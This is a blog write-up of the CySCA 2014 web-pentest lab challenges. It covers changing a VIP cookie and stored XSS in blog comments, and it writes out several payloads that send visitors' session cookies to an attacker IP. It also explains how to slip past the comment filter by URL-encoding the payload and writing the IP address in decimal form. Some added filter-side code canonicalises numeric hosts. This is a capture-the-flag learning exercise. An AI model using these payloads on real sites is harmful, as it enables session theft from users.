Saturday, March 12, 2016

CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up

This challenge can be downloaded from vulnhub.com.

Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

Looking at the web page, we notice that when the page is first visited the link to the "Blog" is disabled. Somehow we need to re-enable the link to get the flag.


Below is a Python script that sends a quick GET request to the index.py page.



Notice that among the cookies returned is vip=0. From this you can suppose that a VIP user will have a value other than 0. If I modify it to 1, the link to the Blog becomes enabled. Clicking the Blog link then reveals the flag.




160 points - Gain access to the Blog as a registered user to reveal the hidden flag.

The blog allows you to insert comments, so I checked whether XSS is possible when a comment is inserted. At the bottom of the textbox you can see how to make text bold or italicized and how to add a link. Testing the link feature showed that the link title is where we can place the XSS.
With this understanding we can now include XSS in the page to pull the session cookies of other visitors to the page. I tried the following in a link title tag:

[<SCRIPT type="text/javascript">var adr = 'http://172.16.102.1/test.php?cookie=' + escape(document.cookie);</SCRIPT>](Test)

The above script was filtered and not posted as a comment, so I tried a different encoding (URL-encoded):

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172.16.102.1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

This time the comment did post as a link; however, the IP address is truncated after the first octet. Next I encoded the IP address further by URL-encoding the periods:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

I tried the above and the filter still caught the encoded IP address. I needed another way to encode the IP address and found the following:


This is interesting. The link in this page appears as the following:

<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>


Below is a Python script that I found to convert an IP address to a decimal-encoded number.

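#!/usr/bin/env python3

import socket, struct

# Pack the dotted quad into 4 network-order bytes, then read them back
# as a single unsigned 32-bit integer.
print(struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0])
# Output: 2886755841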
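The decimal form gets past the comment filter because the filter matches dotted quads, while URL host parsers that follow inet_aton rules accept one to four numeric parts. As an added example (not from the original write-up or the challenge code), here is a filter-side check that URL-decodes a comment and canonicalises every numeric URL host to a dotted quad before any allow/deny decision; the function names and sample comments are hypothetical.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

def _part(tok):
    """One inet_aton-style component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if re.fullmatch(r"0x[0-9a-f]+", tok, re.I):
        return int(tok, 16)
    if re.fullmatch(r"0[0-7]*", tok):
        return int(tok, 8)
    if re.fullmatch(r"[1-9][0-9]*", tok):
        return int(tok)
    raise ValueError(tok)

def canonical_ipv4(host):
    """Dotted quad for any numeric host form (1 to 4 parts), or None for a name."""
    toks = host.split(".")
    if len(toks) > 4:
        return None
    try:
        *head, last = [_part(t) for t in toks]
    except ValueError:
        return None
    # Leading parts are single bytes; the last part fills all remaining bytes.
    if any(n > 0xFF for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))

def ip_hosts_in(comment):
    """Canonical IPv4 literals used as URL hosts in a comment, after URL-decoding."""
    decoded = unquote_plus(comment)
    hosts = []
    for url in re.findall(r"https?://[^\s'\"<>()\[\]]+", decoded, re.I):
        ip = canonical_ipv4(urlsplit(url).hostname or "")
        if ip:
            hosts.append(ip)
    return hosts

# Constructed sample comments built from the address used in this write-up.
SAMPLES = ["see http://172.16.102.1/test.php", "see http://2886755841/?c=",
           "see http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php", "see http://example.com/x"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, "->", ip_hosts_in(s))
```

Every numeric sample resolves to the same 172.16.102.1, so a rule written against the canonical form covers the dotted, URL-encoded and decimal variants at once.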

With the encoded IP address I changed the comment to the following; however, I noticed that we are truncated to just 50+ characters:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F2886755841%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

So the following does pull the PHPSESSID:

[<script>document.location='http://2886755841/?c='+document.cookie;</script>](Test)

However, this redirects the user rather than doing it blindly. (The version below does not work.)

[<script src='http://2886755841/?c='+document.cookie></script>](Test)






220 points - Retrieve the hidden flag from the database.



260 points - Retrieve the hidden flag by gaining access to the caching control panel.



280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.
